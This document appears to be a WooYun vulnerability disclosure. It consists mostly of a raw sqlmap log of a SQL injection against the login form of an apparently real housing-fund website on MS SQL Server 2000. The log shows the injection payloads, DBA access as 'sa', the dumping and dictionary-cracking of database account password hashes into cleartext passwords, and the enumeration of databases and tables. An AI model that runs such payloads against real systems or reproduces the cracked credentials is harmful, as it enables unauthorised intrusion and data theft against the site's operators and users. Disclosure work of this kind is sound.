WooYun.org

**.**.**.**:8080/hfgjj/jsp/web/private/login.jsp

**.**.**.**:8080/hfgjj/jsp/web/private/loginAction.jsp (POST)
loginname=admin&password=123456

[22:16:44] [INFO] loading tamper script 'between'
[22:16:44] [INFO] loading tamper script 'randomcase'
[22:16:44] [INFO] loading tamper script 'space2comment'
[22:16:44] [INFO] testing connection to the target URL
[22:16:44] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[22:16:46] [INFO] target URL is stable
[22:16:46] [INFO] testing if POST parameter 'loginname' is dynamic
[22:16:46] [INFO] confirming that POST parameter 'loginname' is dynamic
[22:16:46] [INFO] POST parameter 'loginname' is dynamic
[22:16:46] [WARNING] heuristic (basic) test shows that POST parameter 'loginname
' might not be injectable
[22:16:46] [INFO] testing for SQL injection on POST parameter 'loginname'
[22:16:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:16:47] [INFO] POST parameter 'loginname' seems to be 'AND boolean-based blin
d - WHERE or HAVING clause' injectable
[22:16:48] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] y
[22:16:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:16:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[22:16:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[22:16:51] [INFO] testing 'MySQL inline queries'
[22:16:51] [INFO] testing 'PostgreSQL inline queries'
[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:16:51] [INFO] testing 'Oracle inline queries'
[22:16:51] [INFO] testing 'SQLite inline queries'
[22:16:51] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:16:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:16:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:17:02] [INFO] POST parameter 'loginname' seems to be 'Microsoft SQL Server/S
ybase stacked queries' injectable
[22:17:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:17:12] [INFO] POST parameter 'loginname' seems to be 'Microsoft SQL Server/S
ybase time-based blind' injectable
[22:17:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:17:12] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[22:17:19] [INFO] target URL appears to be UNION injectable with 19 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[22:17:36] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
POST parameter 'loginname' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N] n
sqlmap identified the following injection points with a total of 127 HTTP(s) req
uests:
---
Place: POST
Parameter: loginname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: loginname=admin' AND 8526=8526 AND 'rgnd'='rgnd&password=123456
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: loginname=admin'; WAITFOR DELAY '0:0:5'--&password=123456
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: loginname=admin' WAITFOR DELAY '0:0:5'--&password=123456
---
[22:17:47] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[22:17:47] [INFO] testing Microsoft SQL Server
[22:17:47] [INFO] confirming Microsoft SQL Server
[22:17:48] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[22:22:11] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[22:22:11] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[22:22:11] [INFO] fetching current user
[22:22:11] [INFO] retrieving the length of query output
[22:22:11] [INFO] retrieved: 2
[22:22:14] [INFO] retrieved: sa
current user:    'sa'
[22:22:14] [INFO] fetching current database
[22:22:14] [INFO] retrieving the length of query output
[22:22:14] [INFO] retrieved: 5
[22:22:18] [INFO] retrieved: hfgjj
current database:    'hfgjj'
[22:22:18] [INFO] testing if current user is DBA
current user is DBA:    True
[22:23:31] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[22:23:31] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[22:23:31] [INFO] fetching database users
[22:23:31] [INFO] fetching number of database users
[22:23:31] [INFO] retrieved: 4
[22:23:32] [INFO] retrieving the length of query output
[22:23:32] [INFO] retrieved: 5
[22:23:37] [INFO] retrieved: 12329
[22:23:37] [INFO] retrieving the length of query output
[22:23:37] [INFO] retrieved: 22
[22:24:01] [INFO] retrieved: __I__IN_Administrators 17/22 (77%)
[22:24:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:24:02] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[22:24:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:24:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:24:04] [INFO] retrieved: BUI_TIN_Administrators 20/22 (91%)
[22:24:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:24:08] [INFO] retrieved: BUILTIN_Administrators 21/22 (95%)
[22:24:10] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:24:13] [INFO] retrieved: BUILTIN\Administrators
[22:24:13] [INFO] retrieving the length of query output
[22:24:13] [INFO] retrieved: 6
[22:24:21] [INFO] retrieved: hengke
[22:24:21] [INFO] retrieving the length of query output
[22:24:21] [INFO] retrieved: 2
[22:24:24] [INFO] retrieved: sa
database management system users [4]:
[*] 12329
[*] BUILTIN\\Administrators
[*] hengke
[*] sa
[22:24:54] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[22:24:54] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[22:24:54] [INFO] fetching database users password hashes
[22:24:54] [INFO] fetching database users
[22:24:54] [INFO] fetching number of database users
[22:24:54] [INFO] resumed: 4
[22:24:54] [INFO] retrieving the length of query output
[22:24:54] [INFO] resumed: 5
[22:24:54] [INFO] resumed: 12329
[22:24:54] [INFO] retrieving the length of query output
[22:24:54] [INFO] resumed: 22
[22:24:54] [INFO] resumed: BUILTIN\\Administrators
[22:24:54] [INFO] retrieving the length of query output
[22:24:54] [INFO] resumed: 6
[22:24:54] [INFO] resumed: hengke
[22:24:54] [INFO] retrieving the length of query output
[22:24:54] [INFO] resumed: 2
[22:24:54] [INFO] resumed: sa
[22:24:54] [INFO] fetching number of password hashes for user '12329'
[22:24:54] [INFO] retrieved: 1
[22:24:55] [INFO] fetching password hashes for user '12329'
[22:24:55] [INFO] retrieving the length of query output
[22:24:55] [INFO] retrieved: 94
[22:25:17] [INFO] retrieved: 0__100f0_08170__f_f_______________ 13/94 (14%)
[22:25:17] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:17] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[22:25:22] [INFO] retrieved: 0x_100f0_08170__faf_5_e6__________ 18/94 (19%)
[22:25:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:27] [INFO] retrieved: 0x0100f0_08170__faf_5_e66_3_______ 21/94 (22%)
[22:25:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:27] [INFO] retrieved: 0x0100f0_08170__faf_5_e66_38______ 22/94 (23%)
[22:25:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:34] [INFO] retrieved: 0x0100f07081700cfaf_59e66_38e_2___ 28/94 (30%)
[22:25:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:43] [INFO] retrieved: ..081700cfaf759e66_38e_2f3b____6_.. 34/94 (36%)
[22:25:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:48] [INFO] retrieved: ..081700cfaf759e66438e_2f3b_8_166.. 38/94 (40%)
[22:25:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:51] [INFO] retrieved: ..00cfaf759e66438e_2f3b_8_166_5_9.. 41/94 (44%)
[22:25:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:25:55] [INFO] retrieved: ..00cfaf759e66438e_2f3b_8_16645d9.. 43/94 (46%)
[22:25:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:08] [INFO] retrieved: ..ea2f3b_8_16645d9e13_8_db_e0c_af.. 54/94 (57%)
[22:26:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:13] [INFO] retrieved: ..b_8_16645d9e13_8_db_e0c_af_59e6.. 59/94 (63%)
[22:26:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:16] [INFO] retrieved: .._16645d9e13d8_db_e0c_af_59e664_.. 62/94 (66%)
[22:26:17] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:18] [INFO] retrieved: ..716645d9e13d8_db_e0c_af_59e664_.. 63/94 (67%)
[22:26:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:25] [INFO] retrieved: ..3d8ddb7e0c_af_59e664_8ea_f_b___.. 70/94 (74%)
[22:26:26] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:29] [INFO] retrieved: ..8ddb7e0c_af_59e664_8ea_f3b____6.. 72/94 (77%)
[22:26:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:35] [INFO] retrieved: ..b7e0c_af759e664_8ea_f3b__716_45.. 78/94 (83%)
[22:26:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:44] [INFO] retrieved: ..af759e66438ea_f3ba8716_45d9_1_d.. 84/94 (89%)
[22:26:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:26:50] [INFO] retrieved: ..9e66438ea2f3ba8716645d9_13d8ddb7e 93/94 (99%)
[22:26:56] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:26:59] [INFO] retrieved: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8dd
b7e0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
[22:26:59] [INFO] fetching number of password hashes for user 'BUILTIN\Administr
ators'
[22:26:59] [INFO] retrieved: 0
[22:27:01] [WARNING] unable to retrieve the number of password hashes for user '
BUILTIN\Administrators'
[22:27:01] [INFO] fetching number of password hashes for user 'hengke'
[22:27:01] [INFO] retrieved: 1
[22:27:03] [INFO] fetching password hashes for user 'hengke'
[22:27:03] [INFO] retrieving the length of query output
[22:27:03] [INFO] retrieved: 94
[22:27:24] [INFO] retrieved: 0x010_d___fb4_cf379_d_____________ 15/94 (16%)
[22:27:26] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:27:27] [INFO] retrieved: 0x010_d___fb4_cf379_d__a__________ 16/94 (17%)
[22:27:28] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:27:28] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:27:31] [INFO] retrieved: 0x010_d___fb4_cf379dd1_aa_________ 19/94 (20%)
[22:27:33] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:27:33] [INFO] retrieved: 0x010_d__afb4_cf379dd1_aa_________ 20/94 (21%)
[22:27:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:27:47] [INFO] retrieved: ..db4afb45cf379dd1faa__d59_a4____.. 32/94 (34%)
[22:27:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:27:49] [INFO] retrieved: ..db4afb45cf379dd1faab_d59_a4b___.. 34/94 (36%)
[22:27:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:27:54] [INFO] retrieved: ..b45cf379dd1faabfd59_a4b__83d___.. 38/94 (40%)
[22:27:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:00] [INFO] retrieved: ..f379dd1faabfd592a4b__83d_b_6e_c.. 42/94 (45%)
[22:28:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:06] [INFO] retrieved: ..faabfd592a4b6_83d_b_6e1c_d_993_.. 48/94 (51%)
[22:28:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:07] [INFO] retrieved: ..faabfd592a4b6_83d_b_6e1c1d_993_.. 49/94 (52%)
[22:28:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:20] [INFO] retrieved: ..4b6c83d0b56e1c1d59930_ba0_c5c__.. 61/94 (65%)
[22:28:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:28] [INFO] retrieved: ..d0b56e1c1d59930_ba0_c5c__75___e.. 63/94 (67%)
[22:28:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:39] [INFO] retrieved: ..d0b56e1c1d59930_ba0ec5c2_75___e.. 65/94 (69%)
[22:28:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:39] [INFO] retrieved: ..d0b56e1c1d59930_ba0ec5c2_75_a_e.. 66/94 (70%)
[22:28:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:41] [INFO] retrieved: ..e1c1d59930_ba0ec5c2_75_a_e_9___.. 67/94 (71%)
[22:28:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:49] [INFO] retrieved: ..1d599309ba0ec5c2775_ace39_4d_0_.. 75/94 (80%)
[22:28:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:58] [INFO] retrieved: ..ba0ec5c2775dace3924d_0_c80__900.. 83/94 (88%)
[22:28:58] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:28:59] [INFO] retrieved: ..ec5c2775dace3924d_0_c80__900c6_.. 84/94 (89%)
[22:29:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:12] [INFO] retrieved: ..2775dace3924d902c804_900c6b0df944 93/94 (99%)
[22:29:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:18] [INFO] retrieved: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599
309ba0ec5c2775dace3924d902c8041900c6b0df944
[22:29:18] [INFO] fetching number of password hashes for user 'sa'
[22:29:18] [INFO] retrieved: 1
[22:29:19] [INFO] fetching password hashes for user 'sa'
[22:29:19] [INFO] retrieving the length of query output
[22:29:19] [INFO] retrieved: 94
[22:29:38] [INFO] retrieved: 0x_1_0d__1_35b39_c_61_____________ 14/94 (15%)
[22:29:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:41] [INFO] retrieved: 0x_1_0d__1_35b39_c_61_be__________ 16/94 (17%)
[22:29:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:29:43] [INFO] retrieved: 0x_1_0d3_1_35b39_ce619be__________ 19/94 (20%)
[22:29:43] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:01] [INFO] retrieved: ..1535b397ce619be__c4_2592e8_b_7_.. 34/94 (36%)
[22:30:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:03] [INFO] retrieved: ..1535b397ce619be87c4_2592e8_b_7_.. 36/94 (38%)
[22:30:03] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:08] [INFO] retrieved: ..397ce619be87c4_2592e80b_7_c0__7.. 41/94 (44%)
[22:30:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:12] [INFO] retrieved: ..7ce619be87c4_2592e80b_7_c0_6713.. 45/94 (48%)
[22:30:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:24] [INFO] retrieved: ..4a2592e80b_7_c006713a7_aac_6__f.. 53/94 (56%)
[22:30:24] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:30:31] [INFO] retrieved: ..2e80b57_c006713a72aac_6_6f04f2_.. 60/94 (64%)
[22:30:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:32] [INFO] retrieved: ..80b57_c006713a72aac_6_6f04f2__d.. 61/94 (65%)
[22:30:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:43] [INFO] retrieved: ..006713a72aac_606f04f250d_0_9__d.. 68/94 (72%)
[22:30:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:48] [INFO] retrieved: ..72aac_606f04f250d_0_9_cd3d5f___.. 72/94 (77%)
[22:30:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:52] [INFO] retrieved: ..72aac_606f04f250d80f9_cd3d5f_c9.. 76/94 (81%)
[22:30:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:30:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:31:03] [INFO] retrieved: ..04f250d80f97cd3d5f7c9_f_aa__6f_.. 85/94 (90%)
[22:31:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[22:31:11] [INFO] retrieved: ..250d80f97cd3d5f7c97fcaa_96fba05ae 93/94 (99%)
[22:31:13] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
[22:31:15] [INFO] retrieved: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72a
acc606f04f250d80f97cd3d5f7c97fcaad96fba05ae
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hash
es? [Y/n/q] y
[22:31:47] [INFO] using hash method 'mssql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\Sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:31:57] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[22:31:59] [INFO] starting dictionary-based cracking (mssql_old_passwd)
[22:31:59] [INFO] starting 2 processes
[22:32:53] [INFO] cracked password '12329' for user '12329'
[22:33:45] [INFO] cracked password 'sa' for user 'sa'
[22:34:49] [INFO] cracked password 'hengke' for user 'hengke'
database management system users password hashes:
[*] 12329 [1]:
    password hash: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf75
9e66438ea2f3ba8716645d9e13d8ddb7e
        header: 0x0100
        salt: f0708170
        mixedcase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
        uppercase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
    clear-text password: 12329
[*] hengke [1]:
    password hash: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c
2775dace3924d902c8041900c6b0df944
        header: 0x0100
        salt: db4afb45
        mixedcase: cf379dd1faabfd592a4b6c83d0b56e1c1d599309
        uppercase: ba0ec5c2775dace3924d902c8041900c6b0df944
    clear-text password: hengke
[*] sa [1]:
    password hash: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f
250d80f97cd3d5f7c97fcaad96fba05ae
        header: 0x0100
        salt: d341535b
        mixedcase: 397ce619be87c4a2592e80b579c006713a72aacc
        uppercase: 606f04f250d80f97cd3d5f7c97fcaad96fba05ae
    clear-text password: sa
[22:36:49] [WARNING] changes made by tampering scripts are not included in show
 payload content(s)
[22:36:49] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[22:36:49] [INFO] fetching database names
[22:36:49] [INFO] fetching number of databases
[22:36:49] [INFO] retrieved: 7
[22:36:49] [INFO] retrieving the length of query output
[22:36:49] [INFO] retrieved: 3
[22:36:52] [INFO] retrieved: gjj
[22:36:52] [INFO] retrieving the length of query output
[22:36:52] [INFO] retrieved: 6
[22:37:00] [INFO] retrieved: hengke
[22:37:00] [INFO] retrieving the length of query output
[22:37:00] [INFO] retrieved: 5
[22:37:06] [INFO] retrieved: hfgjj
[22:37:06] [INFO] retrieving the length of query output
[22:37:06] [INFO] retrieved: 6
[22:37:13] [INFO] retrieved: master
[22:37:13] [INFO] retrieving the length of query output
[22:37:13] [INFO] retrieved: 5
[22:37:19] [INFO] retrieved: model
[22:37:19] [INFO] retrieving the length of query output
[22:37:19] [INFO] retrieved: 4
[22:37:25] [INFO] retrieved: msdb
[22:37:25] [INFO] retrieving the length of query output
[22:37:25] [INFO] retrieved: 6
[22:37:31] [INFO] retrieved: tempdb
available databases [7]:
[*] gjj
[*] hengke
[*] hfgjj
[*] master
[*] model
[*] msdb
[*] tempdb
Database: gjj
[53 tables]
+----------------------+
| CULTURE_INVESTDETAIL |
| CULTURE_INVESTED     |
| D99_CMD              |
| INNER_INFO           |
| LIFA_NEWS            |
| SYS_MENU             |
| SYS_SITE             |
| SYS_SITERIGHT        |
| SYS_USERGROUP        |
| sys_r`le_resource    |
| advise_upload        |
| class_supply         |
| cms_hdjl             |
| culture_info         |
| culture_replyinfo    |
| dtproperties         |
| fagui                |
| fellow_class         |
| fellow_link          |
| focus_user           |
| hdzx                 |
| hero_table           |
| join_table           |
| kill_kk              |
| mail_material        |
| pbcatcol             |
| pbcatedt             |
| pbcatfmt             |
| pbcattbl             |
| pbcatvld             |
| renyuan              |
| renyuan_dw           |
| supply_note          |
| supply_replynote     |
| sys_log              |
| sys_resource         |
| sys_role             |
| sys_siteprevilige    |
| sys_unit             |
| sys_unit_role        |
| sys_unittype         |
| sys_user             |
| sys_user_role        |
| sys_user_unit        |
| sys_userproperty     |
| sysconstraints       |
| syssegments          |
| tongji               |
| v_168_dwdz           |
| v_168_dwhjqk         |
| v_168_dwinfo         |
| v_168_dz             |
| v_168_info           |
+----------------------+
Database: gjj
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.v_168_dwhjqk         | 69152   |
| dbo.sys_log              | 6291    |
| dbo.v_168_dwinfo         | 3317    |
| dbo.tongji               | 629     |
| dbo.v_168_dwdz           | 385     |
| dbo.SYS_SITERIGHT        | 352     |
| dbo.cms_hdjl             | 108     |
| dbo.fagui                | 102     |
| dbo.supply_note          | 69      |
| dbo.sys_resource         | 68      |
| dbo.sys_user_role        | 38      |
| dbo.mail_material        | 34      |
| dbo.supply_replynote     | 34      |
| dbo.SYS_MENU             | 31      |
| dbo.focus_user           | 30      |
| dbo.kill_kk              | 21      |
| dbo.pbcatedt             | 21      |
| dbo.pbcatfmt             | 20      |
| dbo.CULTURE_INVESTDETAIL | 13      |
| dbo.hero_table           | 12      |
| dbo.renyuan              | 12      |
| dbo.sys_role             | 8       |
| dbo.advise_upload        | 6       |
| dbo.D99_CMD              | 5       |
| dbo.sys_user             | 5       |
| dbo.sys_user_unit        | 5       |
| dbo.INNER_INFO           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.class_supply         | 3       |
| dbo.syssegments          | 3       |
| dbo.CULTURE_INVESTED     | 2       |
| dbo.fellow_class         | 2       |
| dbo.fellow_link          | 2       |
| dbo.sys_unittype         | 2       |
| dbo.sysconstraints       | 2       |
| dbo.LIFA_NEWS            | 1       |
| dbo.SYS_SITE             | 1       |
| dbo.sys_siteprevilige    | 1       |
+--------------------------+---------+
[01:16:59] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[01:16:59] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[01:16:59] [INFO] fetching tables for database: hengke
[01:16:59] [INFO] fetching number of tables for database 'hengke'
[01:16:59] [INFO] retrieved: 418
[01:17:00] [INFO] retrieving the length of query output
[01:17:00] [INFO] retrieved: 15
[01:17:18] [INFO] retrieved: db__Ct__C_annel 10/15 (67%)
[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:21] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[01:17:29] [INFO] retrieved: dbo.Cti_Channel
[01:17:29] [INFO] retrieving the length of query output
[01:17:29] [INFO] retrieved: 14
[01:17:45] [INFO] retrieved: dbo.C_____dSet 9/14 (64%)
[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:17:57] [INFO] retrieved: dbo.Cti_ModSet
[01:17:57] [INFO] retrieving the length of query output
[01:17:57] [INFO] retrieved: 14
[01:18:14] [INFO] retrieved: dbo.C_____cord 9/14 (64%)
418个表，速度太慢，就不继续了
因上个已经注入过了，就不继续该数据库了
Database: hfgjj
[109 tables]
+----------------------+
| CULTURE_INVESTDETAIL |
| CULTURE_INVESTED     |
| D99_CMD              |
| D99_REG              |
| D99_Tmp              |
| DIY_TEMPTALBLE       |
| INNER_INFO           |
| LIFA_NEWS            |
| SYS_MENU             |
| SYS_SITERIGHT        |
| SYS_USERGROUP        |
| WELFARE_NEWS         |
| advise_upload        |
| class_supply         |
| cms_hdjl             |
| culture_info         |
| culture_replyinfo    |
| dtproperties         |
| fagui                |
| fellow_class         |
| fellow_link          |
| focus_user           |
| h_fangjian           |
| h_loudong            |
| h_loupan             |
| h_quyu               |
| hdzx                 |
| hero_table           |
| join_table           |
| kill_kk              |
| mail_material        |
| pbcatcol             |
| pbcatedt             |
| pbcatfmt             |
| pbcattbl             |
| pbcatvld             |
| renyuan_dw           |
| renyuan_dw           |
| sqlmapoutput         |
| supply_note          |
| supply_replynote     |
| sys_log              |
| sys_resource         |
| sys_role_resource    |
| sys_role_resource    |
| sys_siteprevilige    |
| sys_siteprevilige    |
| sys_unit_role        |
| sys_unit_role        |
| sys_unittype         |
| sys_user_role        |
| sys_user_role        |
| sys_user_unit        |
| sys_userproperty     |
| sysconstraints       |
| syssegments          |
| tongji               |
| tz_js                |
| tz_note              |
| v_09_10_xh           |
| v_168_dwdz           |
| v_168_dwhjqk_old     |
| v_168_dwhjqk_old     |
| v_168_dwinfo         |
| v_168_dwzz_old       |
| v_168_dwzz_old       |
